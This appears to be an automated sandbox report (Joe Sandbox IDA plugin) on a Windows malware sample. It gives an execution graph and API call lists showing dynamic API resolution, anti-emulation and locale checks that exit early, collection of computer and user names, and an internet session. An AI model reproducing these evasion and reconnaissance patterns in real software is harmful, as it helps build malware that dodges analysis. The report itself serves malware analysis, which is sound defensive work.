                            Total number of Limit Nodes:28
                            execution_graph 25510 d81bf0 25562 d62a90 25510->25562 25514 d81c03 25515 d81c29 lstrcpy 25514->25515 25516 d81c35 25514->25516 25515->25516 25517 d81c6d GetSystemInfo 25516->25517 25518 d81c65 ExitProcess 25516->25518 25519 d81c7d ExitProcess 25517->25519 25520 d81c85 25517->25520 25663 d61030 GetCurrentProcess VirtualAllocExNuma 25520->25663 25525 d81cb8 25675 d82ad0 GetProcessHeap RtlAllocateHeap GetComputerNameA 25525->25675 25526 d81ca2 25526->25525 25527 d81cb0 ExitProcess 25526->25527 25529 d81cbd 25530 d81ce7 lstrlen 25529->25530 25884 d82a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25529->25884 25534 d81cff 25530->25534 25532 d81cd1 25532->25530 25536 d81ce0 ExitProcess 25532->25536 25533 d81d23 lstrlen 25535 d81d39 25533->25535 25534->25533 25537 d81d13 lstrcpy lstrcat 25534->25537 25538 d81d5a 25535->25538 25540 d81d46 lstrcpy lstrcat 25535->25540 25537->25533 25539 d82ad0 3 API calls 25538->25539 25541 d81d5f lstrlen 25539->25541 25540->25538 25543 d81d74 25541->25543 25542 d81d9a lstrlen 25546 d81db0 25542->25546 25543->25542 25544 d81d87 lstrcpy lstrcat 25543->25544 25544->25542 25545 d81dce 25677 d82a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25545->25677 25546->25545 25547 d81dba lstrcpy lstrcat 25546->25547 25547->25545 25549 d81dd3 lstrlen 25550 d81de7 25549->25550 25551 d81df7 lstrcpy lstrcat 25550->25551 25552 d81e0a 25550->25552 25551->25552 25553 d81e28 lstrcpy 25552->25553 25554 d81e30 25552->25554 25553->25554 25555 d81e56 OpenEventA 25554->25555 25556 d81e68 CloseHandle Sleep OpenEventA 25555->25556 25557 d81e8c CreateEventA 25555->25557 25556->25556 25556->25557 25678 d81b20 GetSystemTime 25557->25678 25561 d81ea5 CloseHandle ExitProcess 25885 d64a60 25562->25885 25564 d62aa1 25565 d64a60 2 API calls 25564->25565 25566 d62ab7 25565->25566 25567 d64a60 2 API calls 25566->25567 25568 d62acd 25567->25568 25569 d64a60 2 API calls 25568->25569 25570 d62ae3 25569->25570 25571 d64a60 2 API calls 25570->25571 
25572 d62af9 25571->25572 25573 d64a60 2 API calls 25572->25573 25574 d62b0f 25573->25574 25575 d64a60 2 API calls 25574->25575 25576 d62b28 25575->25576 25577 d64a60 2 API calls 25576->25577 25578 d62b3e 25577->25578 25579 d64a60 2 API calls 25578->25579 25580 d62b54 25579->25580 25581 d64a60 2 API calls 25580->25581 25582 d62b6a 25581->25582 25583 d64a60 2 API calls 25582->25583 25584 d62b80 25583->25584 25585 d64a60 2 API calls 25584->25585 25586 d62b96 25585->25586 25587 d64a60 2 API calls 25586->25587 25588 d62baf 25587->25588 25589 d64a60 2 API calls 25588->25589 25590 d62bc5 25589->25590 25591 d64a60 2 API calls 25590->25591 25592 d62bdb 25591->25592 25593 d64a60 2 API calls 25592->25593 25594 d62bf1 25593->25594 25595 d64a60 2 API calls 25594->25595 25596 d62c07 25595->25596 25597 d64a60 2 API calls 25596->25597 25598 d62c1d 25597->25598 25599 d64a60 2 API calls 25598->25599 25600 d62c36 25599->25600 25601 d64a60 2 API calls 25600->25601 25602 d62c4c 25601->25602 25603 d64a60 2 API calls 25602->25603 25604 d62c62 25603->25604 25605 d64a60 2 API calls 25604->25605 25606 d62c78 25605->25606 25607 d64a60 2 API calls 25606->25607 25608 d62c8e 25607->25608 25609 d64a60 2 API calls 25608->25609 25610 d62ca4 25609->25610 25611 d64a60 2 API calls 25610->25611 25612 d62cbd 25611->25612 25613 d64a60 2 API calls 25612->25613 25614 d62cd3 25613->25614 25615 d64a60 2 API calls 25614->25615 25616 d62ce9 25615->25616 25617 d64a60 2 API calls 25616->25617 25618 d62cff 25617->25618 25619 d64a60 2 API calls 25618->25619 25620 d62d15 25619->25620 25621 d64a60 2 API calls 25620->25621 25622 d62d2b 25621->25622 25623 d64a60 2 API calls 25622->25623 25624 d62d44 25623->25624 25625 d64a60 2 API calls 25624->25625 25626 d62d5a 25625->25626 25627 d64a60 2 API calls 25626->25627 25628 d62d70 25627->25628 25629 d64a60 2 API calls 25628->25629 25630 d62d86 25629->25630 25631 d64a60 2 API calls 25630->25631 25632 d62d9c 25631->25632 25633 d64a60 2 API calls 25632->25633 25634 d62db2 
25633->25634 25635 d64a60 2 API calls 25634->25635 25636 d62dcb 25635->25636 25637 d64a60 2 API calls 25636->25637 25638 d62de1 25637->25638 25639 d64a60 2 API calls 25638->25639 25640 d62df7 25639->25640 25641 d64a60 2 API calls 25640->25641 25642 d62e0d 25641->25642 25643 d64a60 2 API calls 25642->25643 25644 d62e23 25643->25644 25645 d64a60 2 API calls 25644->25645 25646 d62e39 25645->25646 25647 d64a60 2 API calls 25646->25647 25648 d62e52 25647->25648 25649 d86390 GetPEB 25648->25649 25650 d865c3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 25649->25650 25651 d863c3 25649->25651 25652 d86638 25650->25652 25653 d86625 GetProcAddress 25650->25653 25660 d863d7 20 API calls 25651->25660 25654 d8666c 25652->25654 25655 d86641 GetProcAddress GetProcAddress 25652->25655 25653->25652 25656 d86688 25654->25656 25657 d86675 GetProcAddress 25654->25657 25655->25654 25658 d86691 GetProcAddress 25656->25658 25659 d866a4 25656->25659 25657->25656 25658->25659 25661 d866ad GetProcAddress GetProcAddress 25659->25661 25662 d866d7 25659->25662 25660->25650 25661->25662 25662->25514 25664 d61057 ExitProcess 25663->25664 25665 d6105e VirtualAlloc 25663->25665 25666 d6107d 25665->25666 25667 d610b1 25666->25667 25668 d6108a VirtualFree 25666->25668 25669 d610c0 25667->25669 25668->25667 25670 d610d0 GlobalMemoryStatusEx 25669->25670 25672 d610f5 25670->25672 25673 d61112 ExitProcess 25670->25673 25672->25673 25674 d6111a GetUserDefaultLangID 25672->25674 25674->25525 25674->25526 25676 d82b24 25675->25676 25676->25529 25677->25549 25890 d81820 25678->25890 25680 d81b81 sscanf 25929 d62a20 25680->25929 25683 d81be9 25686 d7ffd0 25683->25686 25684 d81bd6 25684->25683 25685 d81be2 ExitProcess 25684->25685 25687 d7ffe0 25686->25687 25688 d80019 lstrlen 25687->25688 25689 d8000d lstrcpy 25687->25689 25690 d800d0 25688->25690 25689->25688 25691 d800db lstrcpy 25690->25691 25692 d800e7 lstrlen 25690->25692 25691->25692 25693 d800ff 25692->25693 25694 d8010a lstrcpy 
25693->25694 25695 d80116 lstrlen 25693->25695 25694->25695 25696 d8012e 25695->25696 25697 d80139 lstrcpy 25696->25697 25698 d80145 25696->25698 25697->25698 25931 d81570 25698->25931 25701 d8016e 25702 d8018f lstrlen 25701->25702 25703 d80183 lstrcpy 25701->25703 25704 d801a8 25702->25704 25703->25702 25705 d801c9 lstrlen 25704->25705 25706 d801bd lstrcpy 25704->25706 25707 d801e8 25705->25707 25706->25705 25708 d8020c lstrlen 25707->25708 25709 d80200 lstrcpy 25707->25709 25710 d8026a 25708->25710 25709->25708 25711 d80282 lstrcpy 25710->25711 25712 d8028e 25710->25712 25711->25712 25941 d62e70 25712->25941 25720 d80540 25721 d81570 4 API calls 25720->25721 25722 d8054f 25721->25722 25723 d805a1 lstrlen 25722->25723 25724 d80599 lstrcpy 25722->25724 25725 d805bf 25723->25725 25724->25723 25726 d805d1 lstrcpy lstrcat 25725->25726 25727 d805e9 25725->25727 25726->25727 25728 d80614 25727->25728 25729 d8060c lstrcpy 25727->25729 25730 d8061b lstrlen 25728->25730 25729->25728 25731 d80636 25730->25731 25732 d8064a lstrcpy lstrcat 25731->25732 25733 d80662 25731->25733 25732->25733 25734 d80687 25733->25734 25735 d8067f lstrcpy 25733->25735 25736 d8068e lstrlen 25734->25736 25735->25734 25737 d806b3 25736->25737 25738 d806c7 lstrcpy lstrcat 25737->25738 25739 d806db 25737->25739 25738->25739 25740 d80704 lstrcpy 25739->25740 25741 d8070c 25739->25741 25740->25741 25742 d80749 lstrcpy 25741->25742 25743 d80751 25741->25743 25742->25743 26697 d82740 GetWindowsDirectoryA 25743->26697 25745 d80785 26706 d64c50 25745->26706 25746 d8075d 25746->25745 25747 d8077d lstrcpy 25746->25747 25747->25745 25749 d8078f 26860 d78ca0 StrCmpCA 25749->26860 25751 d8079b 25752 d61530 8 API calls 25751->25752 25753 d807bc 25752->25753 25754 d807ed 25753->25754 25755 d807e5 lstrcpy 25753->25755 26878 d660d0 80 API calls 25754->26878 25755->25754 25757 d807fa 26879 d781b0 10 API calls 25757->26879 25759 d80809 25760 d61530 8 API calls 25759->25760 25761 d8082f 25760->25761 25762 d8085e 
25761->25762 25763 d80856 lstrcpy 25761->25763 26880 d660d0 80 API calls 25762->26880 25763->25762 25765 d8086b 26881 d77ee0 lstrlen lstrcpy StrCmpCA StrCmpCA StrCmpCA 25765->26881 25767 d80876 25768 d61530 8 API calls 25767->25768 25769 d808a1 25768->25769 25770 d808c9 lstrcpy 25769->25770 25771 d808d5 25769->25771 25770->25771 26882 d660d0 80 API calls 25771->26882 25773 d808db 26883 d78050 lstrlen lstrcpy StrCmpCA lstrlen lstrcpy 25773->26883 25775 d808e6 25776 d61530 8 API calls 25775->25776 25777 d808f7 25776->25777 25778 d8092e 25777->25778 25779 d80926 lstrcpy 25777->25779 26884 d65640 8 API calls 25778->26884 25779->25778 25781 d80933 25782 d61530 8 API calls 25781->25782 25783 d8094c 25782->25783 26885 d77280 1498 API calls 25783->26885 25785 d8099f 25786 d61530 8 API calls 25785->25786 25787 d809cf 25786->25787 25788 d809fe 25787->25788 25789 d809f6 lstrcpy 25787->25789 26886 d660d0 80 API calls 25788->26886 25789->25788 25791 d80a0b 26887 d783e0 7 API calls 25791->26887 25793 d80a18 25794 d61530 8 API calls 25793->25794 25795 d80a29 25794->25795 26888 d624e0 230 API calls 25795->26888 25797 d80a6b 25798 d80a7f 25797->25798 25799 d80b40 25797->25799 25801 d61530 8 API calls 25798->25801 25800 d61530 8 API calls 25799->25800 25803 d80b59 25800->25803 25802 d80aa5 25801->25802 25805 d80acc lstrcpy 25802->25805 25806 d80ad4 25802->25806 25804 d80b87 25803->25804 25807 d80b7f lstrcpy 25803->25807 26892 d660d0 80 API calls 25804->26892 25805->25806 26889 d660d0 80 API calls 25806->26889 25807->25804 25810 d80b8d 26893 d7c840 70 API calls 25810->26893 25811 d80ada 26890 d785b0 47 API calls 25811->26890 25814 d80b38 25817 d80bd1 25814->25817 25820 d61530 8 API calls 25814->25820 25815 d80ae5 25816 d61530 8 API calls 25815->25816 25819 d80af6 25816->25819 25818 d80bfa 25817->25818 25821 d61530 8 API calls 25817->25821 25822 d80c23 25818->25822 25827 d61530 8 API calls 25818->25827 26891 d7d0f0 118 API calls 25819->26891 25824 d80bb9 25820->25824 25826 d80bf5 
25821->25826 25825 d80c4c 25822->25825 25830 d61530 8 API calls 25822->25830 26894 d7d7b0 103 API calls setSBCS 25824->26894 25831 d80c75 25825->25831 25836 d61530 8 API calls 25825->25836 26896 d7dfa0 149 API calls 25826->26896 25833 d80c1e 25827->25833 25829 d80bbe 25834 d61530 8 API calls 25829->25834 25835 d80c47 25830->25835 25837 d80c9e 25831->25837 25843 d61530 8 API calls 25831->25843 26897 d7e500 108 API calls 25833->26897 25839 d80bcc 25834->25839 26898 d7e720 120 API calls 25835->26898 25842 d80c70 25836->25842 25840 d80cc7 25837->25840 25846 d61530 8 API calls 25837->25846 26895 d7ecb0 98 API calls 25839->26895 25847 d80cf0 25840->25847 25853 d61530 8 API calls 25840->25853 26899 d7e9e0 110 API calls 25842->26899 25844 d80c99 25843->25844 26900 d67bc0 154 API calls 25844->26900 25852 d80cc2 25846->25852 25849 d80dca 25847->25849 25850 d80d04 25847->25850 25855 d61530 8 API calls 25849->25855 25854 d61530 8 API calls 25850->25854 26901 d7eb70 108 API calls 25852->26901 25857 d80ceb 25853->25857 25860 d80d2a 25854->25860 25859 d80de3 25855->25859 26902 d841e0 91 API calls 25857->26902 25861 d80e11 25859->25861 25864 d80e09 lstrcpy 25859->25864 25862 d80d5e 25860->25862 25863 d80d56 lstrcpy 25860->25863 26906 d660d0 80 API calls 25861->26906 26903 d660d0 80 API calls 25862->26903 25863->25862 25864->25861 25867 d80e17 26907 d7c840 70 API calls 25867->26907 25868 d80d64 26904 d785b0 47 API calls 25868->26904 25871 d80dc2 25874 d61530 8 API calls 25871->25874 25872 d80d6f 25873 d61530 8 API calls 25872->25873 25875 d80d80 25873->25875 25877 d80e39 25874->25877 26905 d7d0f0 118 API calls 25875->26905 25878 d80e67 25877->25878 25879 d80e5f lstrcpy 25877->25879 26908 d660d0 80 API calls 25878->26908 25879->25878 25881 d80e74 25883 d80e95 25881->25883 26909 d81660 12 API calls 25881->26909 25883->25561 25884->25532 25886 d64a76 RtlAllocateHeap 25885->25886 25889 d64ab4 VirtualProtect 25886->25889 25889->25564 25891 d8182e 25890->25891 25892 d81849 lstrcpy 
25891->25892 25893 d81855 lstrlen 25891->25893 25892->25893 25894 d81873 25893->25894 25895 d81885 lstrcpy lstrcat 25894->25895 25896 d81898 25894->25896 25895->25896 25897 d818c7 25896->25897 25898 d818bf lstrcpy 25896->25898 25899 d818ce lstrlen 25897->25899 25898->25897 25900 d818e6 25899->25900 25901 d818f2 lstrcpy lstrcat 25900->25901 25902 d81906 25900->25902 25901->25902 25903 d81935 25902->25903 25904 d8192d lstrcpy 25902->25904 25905 d8193c lstrlen 25903->25905 25904->25903 25906 d81958 25905->25906 25907 d8196a lstrcpy lstrcat 25906->25907 25908 d8197d 25906->25908 25907->25908 25909 d819ac 25908->25909 25910 d819a4 lstrcpy 25908->25910 25911 d819b3 lstrlen 25909->25911 25910->25909 25912 d819cb 25911->25912 25913 d819d7 lstrcpy lstrcat 25912->25913 25914 d819eb 25912->25914 25913->25914 25915 d81a1a 25914->25915 25916 d81a12 lstrcpy 25914->25916 25917 d81a21 lstrlen 25915->25917 25916->25915 25918 d81a3d 25917->25918 25919 d81a4f lstrcpy lstrcat 25918->25919 25920 d81a62 25918->25920 25919->25920 25921 d81a91 25920->25921 25922 d81a89 lstrcpy 25920->25922 25923 d81a98 lstrlen 25921->25923 25922->25921 25924 d81ab4 25923->25924 25925 d81ac6 lstrcpy lstrcat 25924->25925 25926 d81ad9 25924->25926 25925->25926 25927 d81b00 lstrcpy 25926->25927 25928 d81b08 25926->25928 25927->25928 25928->25680 25930 d62a24 SystemTimeToFileTime SystemTimeToFileTime 25929->25930 25930->25683 25930->25684 25932 d8157f 25931->25932 25933 d8159f lstrcpy 25932->25933 25934 d815a7 25932->25934 25933->25934 25935 d815d7 lstrcpy 25934->25935 25936 d815df 25934->25936 25935->25936 25937 d8160f lstrcpy 25936->25937 25938 d81617 25936->25938 25937->25938 25939 d80155 lstrlen 25938->25939 25940 d81647 lstrcpy 25938->25940 25939->25701 25940->25939 25942 d64a60 2 API calls 25941->25942 25943 d62e82 25942->25943 25944 d64a60 2 API calls 25943->25944 25945 d62ea0 25944->25945 25946 d64a60 2 API calls 25945->25946 25947 d62eb6 25946->25947 25948 d64a60 2 API calls 25947->25948 25949 d62ecb 
25948->25949 25950 d64a60 2 API calls 25949->25950 25951 d62eec 25950->25951 25952 d64a60 2 API calls 25951->25952 25953 d62f01 25952->25953 25954 d64a60 2 API calls 25953->25954 25955 d62f19 25954->25955 25956 d64a60 2 API calls 25955->25956 25957 d62f3a 25956->25957 25958 d64a60 2 API calls 25957->25958 25959 d62f4f 25958->25959 25960 d64a60 2 API calls 25959->25960 25961 d62f65 25960->25961 25962 d64a60 2 API calls 25961->25962 25963 d62f7b 25962->25963 25964 d64a60 2 API calls 25963->25964 25965 d62f91 25964->25965 25966 d64a60 2 API calls 25965->25966 25967 d62faa 25966->25967 25968 d64a60 2 API calls 25967->25968 25969 d62fc0 25968->25969 25970 d64a60 2 API calls 25969->25970 25971 d62fd6 25970->25971 25972 d64a60 2 API calls 25971->25972 25973 d62fec 25972->25973 25974 d64a60 2 API calls 25973->25974 25975 d63002 25974->25975 25976 d64a60 2 API calls 25975->25976 25977 d63018 25976->25977 25978 d64a60 2 API calls 25977->25978 25979 d63031 25978->25979 25980 d64a60 2 API calls 25979->25980 25981 d63047 25980->25981 25982 d64a60 2 API calls 25981->25982 25983 d6305d 25982->25983 25984 d64a60 2 API calls 25983->25984 25985 d63073 25984->25985 25986 d64a60 2 API calls 25985->25986 25987 d63089 25986->25987 25988 d64a60 2 API calls 25987->25988 25989 d6309f 25988->25989 25990 d64a60 2 API calls 25989->25990 25991 d630b8 25990->25991 25992 d64a60 2 API calls 25991->25992 25993 d630ce 25992->25993 25994 d64a60 2 API calls 25993->25994 25995 d630e4 25994->25995 25996 d64a60 2 API calls 25995->25996 25997 d630fa 25996->25997 25998 d64a60 2 API calls 25997->25998 25999 d63110 25998->25999 26000 d64a60 2 API calls 25999->26000 26001 d63126 26000->26001 26002 d64a60 2 API calls 26001->26002 26003 d6313f 26002->26003 26004 d64a60 2 API calls 26003->26004 26005 d63155 26004->26005 26006 d64a60 2 API calls 26005->26006 26007 d6316b 26006->26007 26008 d64a60 2 API calls 26007->26008 26009 d63181 26008->26009 26010 d64a60 2 API calls 26009->26010 26011 d63197 26010->26011 
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D64C7F
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D64CD2
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D64D05
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D64D35
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D64D73
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D64DA6
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00D64DB6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$InternetOpen
                            • String ID: "$------
                            • API String ID: 2041821634-2370822465

                            APIs
                            • GetProcAddress.KERNEL32(74DD0000,00BF2130), ref: 00D863E9
                            • GetProcAddress.KERNEL32(74DD0000,00BF20B8), ref: 00D86402
                            • GetProcAddress.KERNEL32(74DD0000,00BF20D0), ref: 00D8641A
                            • GetProcAddress.KERNEL32(74DD0000,00BF21D8), ref: 00D86432
                            • GetProcAddress.KERNEL32(74DD0000,00BF8D30), ref: 00D8644B
                            • GetProcAddress.KERNEL32(74DD0000,00BE6330), ref: 00D86463
                            • GetProcAddress.KERNEL32(74DD0000,00BE62D0), ref: 00D8647B
                            • GetProcAddress.KERNEL32(74DD0000,00BF2160), ref: 00D86494
                            • GetProcAddress.KERNEL32(74DD0000,00BF21F0), ref: 00D864AC
                            • GetProcAddress.KERNEL32(74DD0000,00BF2190), ref: 00D864C4
                            • GetProcAddress.KERNEL32(74DD0000,00BF2280), ref: 00D864DD
                            • GetProcAddress.KERNEL32(74DD0000,00BE6150), ref: 00D864F5
                            • GetProcAddress.KERNEL32(74DD0000,00BF2178), ref: 00D8650D
                            • GetProcAddress.KERNEL32(74DD0000,00BF2208), ref: 00D86526
                            • GetProcAddress.KERNEL32(74DD0000,00BE62F0), ref: 00D8653E
                            • GetProcAddress.KERNEL32(74DD0000,00BF2220), ref: 00D86556
                            • GetProcAddress.KERNEL32(74DD0000,00BF2238), ref: 00D8656F
                            • GetProcAddress.KERNEL32(74DD0000,00BE6190), ref: 00D86587
                            • GetProcAddress.KERNEL32(74DD0000,00BF2100), ref: 00D8659F
                            • GetProcAddress.KERNEL32(74DD0000,00BE6110), ref: 00D865B8
                            • LoadLibraryA.KERNEL32(00BF2328,?,?,?,00D81C03), ref: 00D865C9
                            • LoadLibraryA.KERNEL32(00BF2358,?,?,?,00D81C03), ref: 00D865DB
                            • LoadLibraryA.KERNEL32(00BF2370,?,?,?,00D81C03), ref: 00D865ED
                            • LoadLibraryA.KERNEL32(00BF22F8,?,?,?,00D81C03), ref: 00D865FE
                            • LoadLibraryA.KERNEL32(00BF22E0,?,?,?,00D81C03), ref: 00D86610
                            • GetProcAddress.KERNEL32(75A70000,00BF2310), ref: 00D8662D
                            • GetProcAddress.KERNEL32(75290000,00BF2340), ref: 00D86649
                            • GetProcAddress.KERNEL32(75290000,00BF2388), ref: 00D86661
                            • GetProcAddress.KERNEL32(75BD0000,00BF23A0), ref: 00D8667D
                            • GetProcAddress.KERNEL32(75450000,00BE6410), ref: 00D86699
                            • GetProcAddress.KERNEL32(76E90000,00BF8DD0), ref: 00D866B5
                            • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00D866CC
                            Strings
                            • NtQueryInformationProcess, xrefs: 00D866C1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232

                            APIs
                              • Part of subcall function 00D86390: GetProcAddress.KERNEL32(74DD0000,00BF2130), ref: 00D863E9
                              • Part of subcall function 00D86390: GetProcAddress.KERNEL32(74DD0000,00BF20B8), ref: 00D86402
                              • Part of subcall function 00D86390: GetProcAddress.KERNEL32(74DD0000,00BF20D0), ref: 00D8641A
                              • Part of subcall function 00D86390: GetProcAddress.KERNEL32(74DD0000,00BF21D8), ref: 00D86432
                              • Part of subcall function 00D86390: GetProcAddress.KERNEL32(74DD0000,00BF8D30), ref: 00D8644B
                              • Part of subcall function 00D86390: GetProcAddress.KERNEL32(74DD0000,00BE6330), ref: 00D86463
                              • Part of subcall function 00D86390: GetProcAddress.KERNEL32(74DD0000,00BE62D0), ref: 00D8647B
                              • Part of subcall function 00D86390: GetProcAddress.KERNEL32(74DD0000,00BF2160), ref: 00D86494
                              • Part of subcall function 00D86390: GetProcAddress.KERNEL32(74DD0000,00BF21F0), ref: 00D864AC
                              • Part of subcall function 00D86390: GetProcAddress.KERNEL32(74DD0000,00BF2190), ref: 00D864C4
                              • Part of subcall function 00D86390: GetProcAddress.KERNEL32(74DD0000,00BF2280), ref: 00D864DD
                              • Part of subcall function 00D86390: GetProcAddress.KERNEL32(74DD0000,00BE6150), ref: 00D864F5
                              • Part of subcall function 00D86390: GetProcAddress.KERNEL32(74DD0000,00BF2178), ref: 00D8650D
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D81C2F
                            • ExitProcess.KERNEL32 ref: 00D81C67
                            • GetSystemInfo.KERNEL32(?), ref: 00D81C71
                            • ExitProcess.KERNEL32 ref: 00D81C7F
                              • Part of subcall function 00D61030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00D61046
                              • Part of subcall function 00D61030: VirtualAllocExNuma.KERNEL32(00000000), ref: 00D6104D
                              • Part of subcall function 00D61030: ExitProcess.KERNEL32 ref: 00D61058
                              • Part of subcall function 00D610C0: GlobalMemoryStatusEx.KERNEL32 ref: 00D610EA
                              • Part of subcall function 00D610C0: ExitProcess.KERNEL32 ref: 00D61114
                            • GetUserDefaultLangID.KERNEL32 ref: 00D81C8F
                            • ExitProcess.KERNEL32 ref: 00D81CB2
                            • ExitProcess.KERNEL32 ref: 00D81CE1
                            • lstrlen.KERNEL32(00BF8DF0), ref: 00D81CEE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D81D15
                            • lstrcat.KERNEL32(00000000,00BF8DF0), ref: 00D81D1D
                            • lstrlen.KERNEL32(00D94B98), ref: 00D81D28
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D81D48
                            • lstrcat.KERNEL32(00000000,00D94B98), ref: 00D81D54
                            • lstrlen.KERNEL32(00000000), ref: 00D81D63
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D81D89
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D81D94
                            • lstrlen.KERNEL32(00D94B98), ref: 00D81D9F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D81DBC
                            • lstrcat.KERNEL32(00000000,00D94B98), ref: 00D81DC8
                            • lstrlen.KERNEL32(00000000), ref: 00D81DD7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D81DF9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D81E04
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                            • String ID:
                            • API String ID: 3366406952-0

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D64AA3
                            • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00D64BB0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                            • API String ID: 1542196881-3329630956

                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00D82AFF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D82B06
                            • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00D82B1A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00D82A6F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D82A76
                            • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00D82A8A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0

                            APIs
                            • GetProcAddress.KERNEL32(74DD0000,00BE61B0), ref: 00D866F5
                            • GetProcAddress.KERNEL32(74DD0000,00BE6250), ref: 00D8670D
                            • GetProcAddress.KERNEL32(74DD0000,00BF9450), ref: 00D86726
                            • GetProcAddress.KERNEL32(74DD0000,00BF9480), ref: 00D8673E
                            • GetProcAddress.KERNEL32(74DD0000,00BF9498), ref: 00D86756
                            • GetProcAddress.KERNEL32(74DD0000,00BF93D8), ref: 00D8676F
                            • GetProcAddress.KERNEL32(74DD0000,00BEC2A8), ref: 00D86787
                            • GetProcAddress.KERNEL32(74DD0000,00BFD320), ref: 00D8679F
                            • GetProcAddress.KERNEL32(74DD0000,00BFD308), ref: 00D867B8
                            • GetProcAddress.KERNEL32(74DD0000,00BFD2F0), ref: 00D867D0
                            • GetProcAddress.KERNEL32(74DD0000,00BFD0E0), ref: 00D867E8
                            • GetProcAddress.KERNEL32(74DD0000,00BE60D0), ref: 00D86801
                            • GetProcAddress.KERNEL32(74DD0000,00BE60F0), ref: 00D86819
                            • GetProcAddress.KERNEL32(74DD0000,00BE6130), ref: 00D86831
